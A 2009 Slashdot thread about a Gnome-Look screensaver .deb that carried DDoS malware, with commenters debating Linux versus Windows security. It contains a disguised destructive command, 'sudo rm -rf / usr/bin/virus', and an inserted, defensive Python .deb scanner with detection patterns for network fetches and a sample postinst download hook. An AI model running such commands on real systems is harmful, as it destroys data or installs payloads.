
Malware Found Hidden In Screensaver On Gnome-Look

AndGodSed writes "OMG! UBUNTU! Reports the following: 'Malware has been found hidden inside an innocuous 'waterfall' screensaver .deb file made available on popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instructions on cleansing your system.
  • Not more safe (Score:3, Insightful)

    by sopssa ( 1498795 ) * <sopssa@email.com> on Wednesday December 09, 2009 @06:39PM (#30382128) Journal

    It's been told to all the linux zealots so many times that Linux itself isn't really more secure against malware than Windows. It's only so because its marketshare is like 0.5%, if even that, and it makes much more sense to make malware where the (non-geeky) users are.

    This just shows that if ever linux did gain marketshare with casual people enough, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.

    The funny thing about this is the same as with Mac OS X users. All of the zealots yelling that Linux/Mac OSX are secure about malware, which results in normal people thinking they can run whatever downloaded "because my OS is secure!".

    And before everyone jumps on the "but you can't get infected by just browsing on porn sites on linux!", why not? When was the last time you got infected by a Windows vulnerability? Those attacks are usually against 3rd party programs like PDF or Flash. And guess what, those apps are on Linux too and are just as well exploitable.

    The only reason malware problems are smaller on Linux than Windows is because of the almost-non-existing desktop marketshare and that those who use it on desktop are usually more tech savvy.

    This just shows that if Linux had 95% marketshare on desktop, and Windows 0.5%, it would be the same thing but just turned around.

  • Re:Not more safe (Score:5, Insightful)

    by nschubach ( 922175 ) on Wednesday December 09, 2009 @06:43PM (#30382196) Journal

    The idea behind it is so that someone will put out a patch for said vulnerability without having to wait for parent company to do so...

    It's not more secure because of its market share, it's more secure because anyone can fix it.

  • Re:Not more safe (Score:4, Insightful)

    by phantomcircuit ( 938963 ) on Wednesday December 09, 2009 @06:45PM (#30382212) Homepage

    This just shows that if ever linux did gain marketshare with casual people enough, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.

    Well that's why the goal is to get as much of the third party software into the repository as possible.

  • Re:Not more safe (Score:5, Insightful)

    by Anonymous Coward on Wednesday December 09, 2009 @06:45PM (#30382220)

    All it shows is that Linux is vulnerable to trojan horses. ALL operating systems are vulnerable to trojan horses. When you show me a Linux or OS X computer that's vulnerable to something like the slammer worm, get back to me.

  • Re:Not more safe (Score:2, Insightful)

    by Suiggy ( 1544213 ) on Wednesday December 09, 2009 @06:46PM (#30382230)
    I agree. The best software in the world can't protect itself from clueless ignorant users who don't know any better. The more clueless, ignorant users using the software, the higher the rate of occurrence of exploitation. If Linux were to become as popular as Windows, I guarantee it would have just as many problems as Windows users currently suffer from.
  • Re:Not more safe (Score:5, Insightful)

    by sopssa ( 1498795 ) * <sopssa@email.com> on Wednesday December 09, 2009 @06:46PM (#30382240) Journal

    But that still requires distros to inspect and validate the patches before they go live to repositories. The big part isn't really fixing the code, it's to test that it surely works and doesn't cause problems for users.

    And even so, if the vulnerability is in, let's say, Flash, just anyone or distros can't fix that closed source application.

  • Re:Not more safe (Score:5, Insightful)

    by sbeckstead ( 555647 ) on Wednesday December 09, 2009 @06:47PM (#30382258) Homepage Journal
    Wrong, anyone can not fix it. Any one MAY fix it.

    Only the tech savvy programmer types that care enough to fix can fix it.
  • Re:Not more safe (Score:1, Insightful)

    by JoshuaZ ( 1134087 ) on Wednesday December 09, 2009 @06:48PM (#30382264) Homepage

    Not really. Linux does a better job in many ways of dealing with serious security holes. While you are correct that if marketshare was reversed there would be a corresponding flip in total malware, I suspect that the amount of malware targeting Linux in our alternate universe would be less than the amount of malware targeting Windows in the real universe. Likely the same order of magnitude, but still different. (I'm ignoring for now the issue of how one would reasonably measure or even define how much malware is out there targeting a given system).

    The real lesson here is that at the end of the day it still comes down to who the users are. Users who are paranoid are less likely to get problems. Most people don't have the resources or will to be paranoid.

  • by Xerp ( 768138 ) on Wednesday December 09, 2009 @06:49PM (#30382266) Journal
    "sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552" Man. I'm going to have to get me some anti-malware software...
  • Re:Not more safe (Score:5, Insightful)

    by _merlin ( 160982 ) on Wednesday December 09, 2009 @06:49PM (#30382278) Homepage Journal

    Malware doesn't need to exploit vulnerabilities in the software: it only needs vulnerable users. There is no way to patch that.

  • Re:Not more safe (Score:5, Insightful)

    by amasiancrasian ( 1132031 ) on Wednesday December 09, 2009 @06:51PM (#30382292)

    I've been telling many the same thing, but with one exception; Mac and *nix have started out with a better permissions system and therefore users who have downloaded an app from the Internet have been trained to be doubly sure about whatever it is that requires sudo power (e.g., the Mac sudo GUI prompt). Microsoft UAC, on the other hand, has had to deal with transitioning software developers to not write in "Program Files" and other public areas and to save data to personal home folders.

    While I'll agree with you that Mac/*nix are not any more secure than Windows, the Mac/*nix users have been taught to take a sudo prompt seriously, while in the early stages and growing pains of UAC, Windows users were easily annoyed by UAC prompts and therefore took the UAC prompts less seriously, because UAC prompts were being triggered by transitioning software developers that did not save data in the user's home folder.

    In the end, the security of any system relies on the ability for the user to authenticate and verify software downloaded. But making it more difficult, such as requiring an administrator password to be entered for elevated privileges, makes users more cautious of software requiring a sudo prompt. And while that's not inherently any more secure, at least users think twice before entering their password.

  • Re:Not more safe (Score:5, Insightful)

    by nschubach ( 922175 ) on Wednesday December 09, 2009 @06:53PM (#30382304) Journal

    The Flash player isn't open source. The Compiler is, the player is not. As I said, the idea behind open source being more secure is that you could have potentially thousands of different solutions to prevent this thing in the future. The best one is chosen and patched into the main tree. If you have the source, you can do this in a few minutes (or put in your own temporary patch) with the proper skill and be back up and more secure than someone waiting for "Patch Tuesday." Even if a patch comes in that resolves that problem, it could have been the first solution to said problem and might have problems itself that will need to be fixed later.

    It's really the potential quantity of solutions to the problem.

    I could argue with you that this vulnerability might have been fixed sooner with more market share.

  • Re:Not more safe (Score:5, Insightful)

    by kai_hiwatari ( 1642285 ) on Wednesday December 09, 2009 @06:54PM (#30382322) Homepage Journal
    This particular malware is not because of a security problem with the OS. It is more of a social engineering thing - trying to trick unsuspecting users to install a malicious script by hiding it as a theme or screensaver.
  • Re:Not more safe (Score:3, Insightful)

    by nschubach ( 922175 ) on Wednesday December 09, 2009 @06:59PM (#30382378) Journal

    But there is a way to minimize the impact, correct? Take this vulnerability for example. It might have had an effect on just the one user, but it wasn't going to be able to infect the system folder...

    Windows is getting better with this, but a Windows user still has more potential system destructive powers than an equivalent Linux user.

  • auto-update (Score:4, Insightful)

    by TheSHAD0W ( 258774 ) on Wednesday December 09, 2009 @07:01PM (#30382404) Homepage

    Okay, this scares me.

    1. What happens when a publisher includes auto-updating code, but not specific attack code, like the DDoS software in the mentioned examples? If discovered it will appear to be a security risk, but not specifically malicious...

    2. What happens when a software developer produces some completely innocuous software, gets into the repositories - and then months down the road, produces an update with DDoS capability, and has the update pushed into the repositories and automatically distributed?

  • by wizardforce ( 1005805 ) on Wednesday December 09, 2009 @07:02PM (#30382426) Journal

    This makes me wonder how long it will be before some warning about a fake virus/trojan/worm succeeds in convincing a few Linux newbies to run some command to get rid of the fake malware which inevitably causes damage or actually downloads actual malware. Something along the lines of: "if you've been infected with virus.deb just run the following command: sudo rm -rf / usr/bin/virus" The only cure is education.

  • Re:Not more safe (Score:5, Insightful)

    by NoobixCube ( 1133473 ) on Wednesday December 09, 2009 @07:04PM (#30382442) Journal

    Mod parent up. I know he's AC, but the point he makes is still good: There is no amount of security that can protect your machine from a clueless user.

    When you install a theme the normal way, you just drag the archive file - that is to say, no executable parts, or any way to make the parts executable - into the theme manager, and presto, it's installed and it asks if you want to apply it. This doesn't require root privileges because it installs to the user's personal themes folder within their home folder. When they do this, there's no way to sneak in a cron job (that's a scheduled task) or any other nasty automatically executing files. Installing from a .deb is usually unnecessary, and as this story proves, exposes your install to risk if you don't pay attention to what you're installing. In my opinion, Ubuntu, being the most newbie-visible Linux distro at the moment, has a responsibility to educate users on things like this. A PDF in their home folder, or a slide show that takes like ten minutes to go through, telling new users how Linux is different to Windows would work wonders, and take up virtually no space on the install disc. There's no excuse for there not being one.

  • by supersloshy ( 1273442 ) on Wednesday December 09, 2009 @07:04PM (#30382450)

    Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this. On Windows and the like, things are so complicated that Anti-virus software is almost required to remove some of their malware. I am glad to use an OS that doesn't restrict me like that. :)

  • Re:Not more safe (Score:5, Insightful)

    by at_slashdot ( 674436 ) on Wednesday December 09, 2009 @07:05PM (#30382452)

    You have a poor understanding of what "malware" is or what Linux/Mac zealots claim.

    Malware is piece of code, all OSes run code, therefore all OSes are vulnerable to malware. What Mac and Linux "zealots" claim is that it's not likely to get malware in Linux/Mac just by browsing a site, opening an e-mail, or just by keeping the computer on and connected to the network -- that hasn't changed.

    "Repositories won't help with that, because people want 3rd party programs and games."

    I am happy with 25,000+ programs available in Debian repository, I never install random package from the Internet. At least the basic packages should be available from the repos so the risk is at least reduced if not eliminated (depending on the behavior of the user)

    In my experience people who use the word "zealot" lack arguments.

  • Re:Not more safe (Score:3, Insightful)

    by sopssa ( 1498795 ) * <sopssa@email.com> on Wednesday December 09, 2009 @07:06PM (#30382464) Journal

    The software ecosystem is "much more confusing" because it's an OS with 95% marketshare and there's millions of 3rd party programs and games for users. And they really want and need those.

    Actually it would really suck if Windows had just one Microsoft verified "app store" where everything is controlled like with iPhone.

  • Re:Repositories! (Score:5, Insightful)

    by binarylarry ( 1338699 ) on Wednesday December 09, 2009 @07:06PM (#30382468)

    Why? Because it's a sane method of delivering software, which is becoming widely used (i.e. Steam, iTunes Store, etc) vs the traditional "Herpes" model used by Windows?

  • Re:Not more safe (Score:4, Insightful)

    by nschubach ( 922175 ) on Wednesday December 09, 2009 @07:07PM (#30382484) Journal

    You are arguing about ignorance of users, not the security of the OS...

  • Re:Repositories! (Score:4, Insightful)

    by sopssa ( 1498795 ) * <sopssa@email.com> on Wednesday December 09, 2009 @07:10PM (#30382510) Journal

    Well do you really want the iPhone like only-approved-software app store for your computer? With no way to download software from anywhere else than that said approved app store.

  • by PeanutButterBreath ( 1224570 ) on Wednesday December 09, 2009 @07:18PM (#30382600)

    Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this.

    Before trolls start yelling about how "OMGZ WINDOZE AV SOFTWARE IS COMPLICATED HAHAHA" and things like that, let me tell you something: because Windows is so accessible, AV software like this can be very easily deployed. All you have to do is click a few icons in the Start Menu to remove this. Blah, blah, blah

    On Linux and the like, everything is simple if you already know what you want to do. Otherwise, you have to trust unaccountable internet entities to provide you abstruse commands to run and hope they aren't trying to trick you into doing even more damage to your system. It should be obvious why that is no way to combat malware.

  • by selven ( 1556643 ) on Wednesday December 09, 2009 @07:26PM (#30382676)

    A confusing command line instruction which most people would Ctrl-C and Ctrl-Shift-V into their terminal is actually a pretty good way to get a virus onto a Linux newbie's computer.

  • Re:Not more safe (Score:5, Insightful)

    by vadim_t ( 324782 ) on Wednesday December 09, 2009 @07:27PM (#30382686) Homepage

    Sorry, this line of argument is stupid.

    You're basically arguing that you can't be more secure than Windows -- Windows' security is as good as things will ever get, and everything else only gets less viruses because it has less marketshare.

    But if so, why all the security advancements in the latest Windows versions? Why isn't it still using Win95 era security? Why did MS bother coding support for NX, UAC and so on? Well, because turns out, it's possible to do better. Current Windows versions are vastly more locked down than Win95, because some design choices turned out to be stupid and vulnerable.

    Linux doesn't follow some common Windows security pitfalls, like having ActiveX and having the browser execute binaries from the net. It also doesn't have autorun. Just that closes several ways of compromising the system, therefore at least in that respect it's more secure. Of course it's not 100% impenetrable, but evidently there exist features and implementation details which make it easier or harder to compromise the system, so not all OSes are equally [in]secure, it depends on how they're implemented.

  • Re:Not more safe (Score:4, Insightful)

    by Anonymous Coward on Wednesday December 09, 2009 @07:29PM (#30382702)

    This particular malware is not because of a security problem with the OS.

    Except that if this was a Windows screensaver you can bet it would be blamed on the OS and not on the fact that it was a social engineering attack.

  • Re:Not more safe (Score:2, Insightful)

    by Anonymous Coward on Wednesday December 09, 2009 @07:29PM (#30382712)

    1. Something like a screensaver does not need root privileges to install, it can be unpacked to the user directory with just user rights.
    2. Even if installed centrally, the applications inside are still run with user privileges.
    3. If some application in the package requires setuid rights, it will be detected by the package manager.

  • by welshbyte ( 839992 ) on Wednesday December 09, 2009 @07:31PM (#30382730) Homepage
    Given that screensavers just help to drain your laptop battery, waste energy and have no practical use these days (unless these people have ancient monitors which are susceptible to screen burn [wikipedia.org]) why do people keep using them and why are they still a feature of modern operating system distributions? Monitor and graphics card power saving features should be all that's needed.
  • Re:Not more safe (Score:4, Insightful)

    by Anonymous Coward on Wednesday December 09, 2009 @07:41PM (#30382830)
    The reason most Windows-based PCs are infected is also due to the ignorance of users. I haven't had a virus or malware attack in years because I keep my antivirus program up to date, I don't visit sites that are prone to malware, and I use safe searching habits. The people who are constantly asking me to fix their computers are the ones who don't follow these strategies.
  • Re:Not more safe (Score:4, Insightful)

    by Voulnet ( 1630793 ) on Wednesday December 09, 2009 @07:43PM (#30382848)

    If you have the source, you can do this in a few minutes (or put in your own temporary patch) with the proper skill and be back up and more secure than someone waiting for "Patch Tuesday."

    If you want Linux to grow and reach more people, as opposed to being a geek niche, then you should forget about requiring people to have the skills necessary to patch the source. Emergence of malware means only one thing: Linux is growing in popularity. Now, if we wish for its popularity to prosper then we should use the normal user's perspective a little bit; you know, people who can't patch the source and compile it by themselves.

  • by imerso ( 1445543 ) on Wednesday December 09, 2009 @07:49PM (#30382910)
    Although I like Linux as well, I think you are somewhat wrong here. This specific malware is a basic one. Wait for the upcoming Linux malware generations, and try to keep your statement that it'll be easier to get rid from Linux... I can't see any difference, the malware author could patch your bin executables, wreak havoc on your etc configuration files, and what not, considering the installer was running as admin. Think more about that.
  • Re:Not more safe (Score:5, Insightful)

    by nschubach ( 922175 ) on Wednesday December 09, 2009 @08:03PM (#30383048) Journal

    I have a Windows machine which has been running just fine for years, but that doesn't mean that it's just as secure. If I do get a virus on that machine, there's a greater chance I will be rebuilding it opposed to my Linux machine.

  • Re:Not more safe (Score:2, Insightful)

    by Anonymous Coward on Wednesday December 09, 2009 @08:03PM (#30383054)

    the "secret" vulnerabilities will be fixed on OSS, while they still exist in secret source software.

    Huh? In either case, they only get fixed if someone finds them and reports them as bugs. Users are not expected to be OS and Kernel developers/experts. But even then, You have to deal with users who don't patch their systems.

    Conficker worm:

    Vulnerability patched: - October 23, 2008 ( http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx [microsoft.com] )

    Worm seen in wild: - November 2008 and still spreading to this day

    I wonder if the press gave MS a pass on this, since they had already patched it before the first report of the worm was logged. If the tables were reversed I'll bet 100% of Slashdot and the other online Linux cheerleaders would claim it wasn't the fault of any distro. You'd see snide posts like
    "Unpatched computers get infected. News at 11", "Idiots who don't patch their system get infected", etc. No, it's not a strawman, it's an informed opinion ;)

  • Re:Not more safe (Score:3, Insightful)

    by bcmm ( 768152 ) on Wednesday December 09, 2009 @08:11PM (#30383140)

    In history malware tried to just fuck over the computer which would had required root access

    (If I didn't have backups) I would rather you ran rm -r /etc/ than rm -r ~/ on my box.

  • Re:Not more safe (Score:2, Insightful)

    by Risen888 ( 306092 ) on Wednesday December 09, 2009 @08:11PM (#30383146)

    That already happened, dude. Like six years ago. Get with the program here.

  • Re:Not more safe (Score:4, Insightful)

    by Jon.Laslow ( 809215 ) on Wednesday December 09, 2009 @08:28PM (#30383298) Homepage Journal
    "...or a slide show that takes like ten minutes to go through..."

    Did you just seriously suggest that Ubuntu include a ten minute presentation for users to watch? As in, no sarcasm there? Do you honestly expect anyone to actually sit through that? Most people don't have the attention span to sit through the multilingual Welcome video OS X shows on first-boot without trying to skip it, let alone something that talks about security for ten minutes. Remember, if you can't make the user care enough to look in the address bar to see if the 'PayPal' link sent to them in an email is actually legit, you aren't going to make them care enough to sit through ten minutes of tedium after their install is done.
  • by Drakin020 ( 980931 ) on Wednesday December 09, 2009 @08:32PM (#30383330)

    Ah but here is the problem.

    To you, removing a virus from Linux is easy, because you are obviously an intelligent Linux user.

    (Someone posted above the removal instructions)

    For you to write out: sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

    seems like nothing at all, but what about the average computer user? Do you think they know what sudo is? Hell I don't use Linux and I have no idea what the shit any of that stuff means. So no, that would only work with someone who really knows what they are doing with Linux.

    Now on the flip side, you say...

    "On Windows and the like, things are so complicated that Anti-virus software is almost required to remove some of their malware"

    Ah, but this is going off the assumption that we are dealing with an average Windows user, not an expert user (Such as yourself with Linux)

    An expert Windows user like myself would say "Removing Malware is easy, just go into the registry's run section, remove what looks suspicious, delete temp files, prefetch, and search for the malware running process (Example: virus.exe) in the registry, and delete it"

    Ah see that to me is easy, I've done things like that all the time, and it's just cake.

    So I guess the point I'm trying to make is that...To you, removing a virus like this from Linux can be really simple...to someone who knows Linux, but the same can be said to a Windows user...who knows about Windows.

  • by Lost Race ( 681080 ) on Wednesday December 09, 2009 @08:40PM (#30383400)

    For those affected, both sites also provide instruction on cleansing your system.

    There's only one way to "cleanse" your system of malware once it's infected:

    1. Boot from known-good media (i.e. pressed CD from OS distributor)
    2. Block-erase hard drive(s)
    3. Re-install OS
    4. Restore documents from backup

    Any malware that can auto-update itself can potentially install anything at all. It could, for example, set up a file-sharing node which caches illegal data files [slashdot.org] on your system.

  • by DiegoBravo ( 324012 ) on Wednesday December 09, 2009 @08:46PM (#30383466) Journal

    This kind of problem is not about Linux or Windows but about distro that added malware in some crap application. In order to avoid that:

    1) The typical crap software should not be allowed the same privileges as a typical user (why should a screensaver open sockets? remove files?) There are capabilities and several security options that nobody takes seriously

    2) The package system should allow only a predefined set of actions in the installation process. Currently it runs as root any package's script; that's the reason I avoid all .deb files as provided by software vendors but obviously the problem is worse if the malware comes from the distribution
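
One way to look at what a third-party .deb would run as root before installing it, as an added example that is not part of the thread or any poster's code: it parses the package's ar container, scans the maintainer scripts, and flags payload files dropped into auto-run locations such as /etc/profile.d. The pattern list, the function names and the sample package are constructed for illustration.

```python
# Added example: static pre-install audit of a .deb (all names are this example's own).
import io
import re
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm", "config"}
# Heuristics chosen for this example; a match means "read this script", not "malware".
SUSPICIOUS = {
    "network fetch": re.compile(r"\b(wget|curl|ftp)\b"),
    "writes a login/boot hook": re.compile(r"/etc/(profile|rc\.local|cron|init\.d)"),
    "pipes into a shell": re.compile(r"\|\s*(ba)?sh\b"),
}
AUTORUN_DIRS = ("etc/profile.d/", "etc/cron", "etc/init.d/", "etc/xdg/autostart/")


def ar_members(blob):
    """Yield (name, data) for each member of the ar archive that wraps a .deb."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    pos = len(AR_MAGIC)
    while pos + 60 <= len(blob):
        header = blob[pos:pos + 60]
        if header[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = header[:16].decode("ascii").strip().rstrip("/")
        size = int(header[48:58].decode("ascii").strip())
        pos += 60
        yield name, blob[pos:pos + size]
        pos += size + (size & 1)  # member data is padded to an even length


def tar_files(data):
    """Yield (normalised path, mode, bytes) for regular files in a tar member."""
    # "r:*" auto-detects gz/bz2/xz; zstd members may need an external decompressor.
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar.getmembers():
            if member.isfile():
                path = re.sub(r"^\.?/+", "", member.name)
                yield path, member.mode, tar.extractfile(member).read()


def audit_deb(blob):
    """Return findings about code the package would run as root or auto-start."""
    findings = []
    for name, data in ar_members(blob):
        if name.startswith("control.tar"):
            for path, _mode, body in tar_files(data):
                text = body.decode("utf-8", "replace")
                for label, pattern in SUSPICIOUS.items():
                    if path in MAINTAINER_SCRIPTS and pattern.search(text):
                        findings.append(f"{path}: {label}")
        elif name.startswith("data.tar"):
            for path, mode, _body in tar_files(data):
                if path.startswith(AUTORUN_DIRS):
                    findings.append(f"{path}: installed into auto-run location")
                if mode & 0o6000:
                    findings.append(f"{path}: setuid/setgid bit set")
    return findings


def make_tar_gz(files):
    """Build a .tar.gz from {path: (content, mode)} (helper for the constructed sample)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, (content, mode) in files.items():
            info = tarfile.TarInfo(path)
            info.size, info.mode = len(content), mode
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def make_ar(members):
    """Wrap (name, data) pairs in an ar archive with 60-byte member headers."""
    out = AR_MAGIC
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        out += data + (b"\n" if len(data) & 1 else b"")
    return out


def build_sample_deb():
    """Constructed, inert sample: a 'screensaver' whose postinst fetches a file."""
    control = make_tar_gz({
        "./control": (b"Package: example-screensaver\nVersion: 1.0\n", 0o644),
        "./postinst": (b"#!/bin/sh\nwget -q http://example.invalid/update\n", 0o755),
    })
    data = make_tar_gz({
        "./usr/share/example/waterfall.png": (b"\x89PNG", 0o644),
        "./etc/profile.d/example.sh": (b"# runs at every login\n", 0o644),
    })
    return make_ar([("debian-binary", b"2.0\n"),
                    ("control.tar.gz", control), ("data.tar.gz", data)])


if __name__ == "__main__":
    for finding in audit_deb(build_sample_deb()):
        print("REVIEW:", finding)
```

On a Debian or Ubuntu system, `dpkg-deb -e package.deb dir` and `dpkg-deb -c package.deb` expose the same maintainer scripts and file list for reading by hand.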

  • by Anonymous Coward on Wednesday December 09, 2009 @08:48PM (#30383482)

    I think you missed his point.. he was making a joke that he doesn't have to use sudo because his account is root.

  • Re:Not more safe (Score:5, Insightful)

    by LordLimecat ( 1103839 ) on Wednesday December 09, 2009 @08:49PM (#30383494)
    If gnome-look is hosting .debs and not reviewing them, it seems to me like they're inviting disaster.
  • Re:Not more safe (Score:4, Insightful)

    by Goaway ( 82658 ) on Wednesday December 09, 2009 @08:51PM (#30383532) Homepage

    We are not. The whole point is that there is one actual human user, and thus there is zero difference if the malware can spread to other users or not, since it has already infected 100% of the available users.

  • Re:Not more safe (Score:3, Insightful)

    by oatworm ( 969674 ) on Wednesday December 09, 2009 @09:04PM (#30383638) Homepage
    Except if the screensaver happens to have some other program attached to the installation package, it'll be installed with root privileges without you knowing about it. Once that happens, you're done - it can rename system files, replace existing system files with its own 'dirty' files, or do anything else that root can do (i.e. practically anything), including preventing you from ever uninstalling it. They don't call it a "rootkit" because it first came out on Windows.
  • Re:Not more safe (Score:5, Insightful)

    by Thinboy00 ( 1190815 ) <thinboy00@@@gmail...com> on Wednesday December 09, 2009 @09:14PM (#30383736) Journal

    There's also been some evidence of malware that triggers AV software on purpose, and acts as a distraction while the real dirty payload gets delivered silently elsewhere in your system. You are now fooled into thinking your system is clean because your AV caught the distraction virus, completely missing the real one that was also installed.

    AVs don't get "distracted" -- either the real payload is detectable by the AV, in which case the distraction won't be successful since both will be found and removed, or else the real payload is undetectable, in which case you don't need the distraction at all, and as a matter of fact it hurts you by making the user more security-conscious.

  • by visualight ( 468005 ) on Wednesday December 09, 2009 @09:24PM (#30383830) Homepage

    Oh, dude. When I'm forced to use a Windows machine my #2 pet peeve is the paste buffer. You don't realize how much middle clicking you do until you don't have it anymore.

  • by istartedi ( 132515 ) on Wednesday December 09, 2009 @10:58PM (#30384454) Journal

    You forgot to verify the BIOS checksum.

    Although most malware probably doesn't go that far, it seems like if I really wanted to "pwn yur box", I'd at least patch rm to not delete my executable and instead simply fool the user into thinking it was gone. Patch ps to not display the process.... and general other rootkit mischief. I'm not terribly familiar with that kind of thing, but I assume there are people who have made it their life's work to hide executables on Linux, whereas I KNOW there are people who've made it their life's work on Windows.

    The only real solution, IMHO, is to drop-kick the computer out the door and use parchment and a quill pen for all your correspondence. Let's see 'em hack the Amish.

  • Re:Not more safe (Score:4, Insightful)

    by Fractal Dice ( 696349 ) on Wednesday December 09, 2009 @11:05PM (#30384496) Journal

    That's not the lesson I see. To me it says that a user-based security model is insufficient - apps are too free to call/use each other - the threat has moved from "rooting a box" but rather to "rooting a user". OSes (and users) need to start looking at the user as a system administrator of many threads of personal data.

    Web browsers have already discovered much of this - different tabs on your web browser are like different apps and just as a sysadmin cannot trust all the users to play nice with each others' data, users can't trust different apps with full access to all other apps.

  • Re:Not more safe (Score:1, Insightful)

    by GNUALMAFUERTE ( 697061 ) <almafuerte@@@gmail...com> on Wednesday December 09, 2009 @11:18PM (#30384562)

    That is not true for a very simple reason:

    GNU/Linux is used on over 60% of the world's servers. 90% of the world's supercomputers run GNU/Linux. Of course, many of those servers have qualified sysadmins, but many don't. Actually, MOST don't. Most are default installs running the Sendmails, Apaches, Asterisks and Sambas of countless organizations. And they don't get broken into everyday. They run flawlessly for years. If you check the logs of any GNU/Linux machine with a public IP, you'll see thousands of attempts every day, ranging from SSH bruteforce attacks, to carefully crafted screens trying to exploit Apache. But they hold up. GNU/Linux HAS an architecture. You might like it or hate it, but it has one very clearly defined architecture, and it works. Windows has NO architecture. Think about the UAC exploits for Windows Over 9000 that have been there since the first beta and never got fixed. There's no public specifications, no design, just a pile of files mysteriously bound together. That'll never be secure.

    GNU/Linux isn't perfect, and no system is absolutely secure, but it's reasonably secure, and, specially, it's well designed and well documented. When you sit into a GNU/Linux machine, you know what to expect from it. You know what it's doing, and you can clearly configure its behavior.

  • Re:Not more safe (Score:5, Insightful)

    by Intron ( 870560 ) on Wednesday December 09, 2009 @11:28PM (#30384634)

    The idea behind it is so that someone will put out a patch for said vulnerability without having to wait for parent company to do so....

    It turns out that I have patched a serious vulnerability in Linux. Please download and install my patch as root on your system.

    Sincerely,
    Someone

  • Re:Not more safe (Score:5, Insightful)

    by phantomfive ( 622387 ) on Wednesday December 09, 2009 @11:52PM (#30384760) Journal

    If you want Linux to grow and reach more people, as opposed to being a geek niche,

    I don't.

    For me, Linux is the perfect operating system for a programmer. I'd like it to stay that way. If it becomes popular, that's fine; but if it becomes something other than a programmer's operating system, I will switch to BSD or something.

  • Re:Not more safe (Score:5, Insightful)

    by StuartHankins ( 1020819 ) on Thursday December 10, 2009 @01:28AM (#30385216)

    Personally I don't care if Linux is ever employed by the "average person". I'm not one of those people and the work I do requires people who know what's going on. Linux gives me the fine control to get in there and tweak things that Windows will probably never have.

    You can make a machine smarter, but people keep getting dumber all the time. At some point you just have to say to those people forget it, you're not going to learn, you're not worth trying to explain it to. Here's your Etch-a-Sketch.

  • Re:Not more safe (Score:3, Insightful)

    by vadim_t ( 324782 ) on Thursday December 10, 2009 @02:21AM (#30385396) Homepage

    Eh? It took far too long for NX to be admitted into kernel, as if software has no bugs NX does not help.

    Similar functionality was available in grsecurity long before. Most distros don't ship the vanilla kernel anyway.

    Linux does have autorun, it just asks "are you sure". We all know how this is going to end up.

    No, it doesn't. Ubuntu will ask things like "Would you like to see the files on this CD, or download photos from it?", but that's not autorun. What I was referring to is running binaries from newly inserted media. AFAIK no Linux distro does that, even after asking.

    1. Linux market share matters, a lot. But then again I have had over ten virus and antivirus free years and most likely will still have some.

    IMO, antiviruses are a flawed security model and shouldn't be needed in a well secured system. Antiviruses only work against known threats, which means somebody must have got hit by them previously, and the antivirus vendor must have noticed.

    It's much better when the system makes a virus' execution unlikely enough that it doesn't manage to spread.

    2. Not all OS's are same. Capabilities, chroot, jail, zones, virtual machines, sandboxes and managed languages, NX, etc. should be used much more. IE8 is interesting, as are e.g. Chrome and Lobo browsers. This all was started by OpenSsh "privilege separation".
    5. You can protect your machine against stupid users (see second point). Quite well, actually, it is just matter of priorities. But in no OS is security #1.

    That doesn't add up. If there is such a thing as an OS that's better protected, some of them are better and some are worse protected, therefore one of those is #1, or at the very least there are security tiers, where some are definitely worse than others.

    3. Linux is not ahead of virus writers. No OS is.
    6. Getting root is not necessary. Reinstalling Linux takes half an hour, reinstalling all my documents takes eternity (how do I know my backups are not infected).
    7. As long as there is money to be made, viruses will be made. Or power (intelligence agencies).

    You seem to be intent on assuming I'm arguing there's such a thing as 100% effective security. But I'm not. I'm arguing that there's such a thing as better security. Linux can be more secure than Windows, while still being vulnerable to some things.

    Also, IMO, that a virus can be technically written for Linux isn't very relevant. The important thing isn't whether it can be done, it's whether it will spread. If it won't spread it'll never be a credible threat, and will remain an academic exercise.

  • by TractorBarry ( 788340 ) on Thursday December 10, 2009 @06:29AM (#30386378) Homepage

    > keep itself updated via downloads

    I keep boring people with this point and I'm going to keep doing so until the Linux peeps get it. Linux needs a program that performs the same function as Zone Alarm. In other words no program on a desktop system should be allowed to connect to the internet before the user has okayed it.

    One of the first things I do when a non-technical friend asks me to help with their Windows PC is to install Zone Alarm simply because it will prompt you before a program can connect to the network or internet. I then explain that if they don't know what a program is, or why it's trying to connect to the internet, don't let it. You can always change your mind later and you can always google it, or ask me, to find out what the program is and what it does.

    This has stopped numerous malware infestations getting serious (i.e. downloading their real payload). I believe there's very little real malware nowadays that doesn't require 'net access to do its work (reporting personal information such as credit card details, being a node in a botnet etc.) so having a gatekeeper between programs and the network should be a primary design consideration of all desktop systems.

    Without this functionality it's just a matter of time before the first serious auto updating Linux virus problem occurs. It might well be harder to get a root infestation on a Linux box but does this matter? A userland program can steal information, participate in a botnet etc. quite adequately for most purposes. If it's well written and consumes little in the way of resources a user probably wouldn't even notice either.

    On Windows Zone Alarm acts like a nightclub bouncer for 'net access. Meanwhile on Linux any old program gets full internet access without the user knowing a thing.
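
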